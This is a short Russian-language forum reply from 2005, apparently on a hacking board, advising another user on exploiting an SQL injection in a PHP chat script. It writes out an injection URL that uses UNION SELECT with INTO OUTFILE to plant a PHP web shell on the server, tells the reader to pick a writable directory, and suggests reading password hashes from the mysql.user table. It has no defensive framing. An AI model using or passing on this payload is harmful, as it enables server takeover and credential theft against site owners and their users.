24.10.2005, 22:11
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131
Репутация:
47
|
|
Нет, читать содержимое директорий не получится.
Но если тебе хватает прав на чтение файлов, то можешь попробовать следующие вещи:
1. Залить шелл:
http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+'<?php',nul l,null,null+FROM+register_user+into+outfile+'../shell.php'/*
Дальше по анологии. Только не забудь поменять директорию, где есть права на запись.
2. Просмотри поле mysql.user.password в таблице mysql.user. |
|
|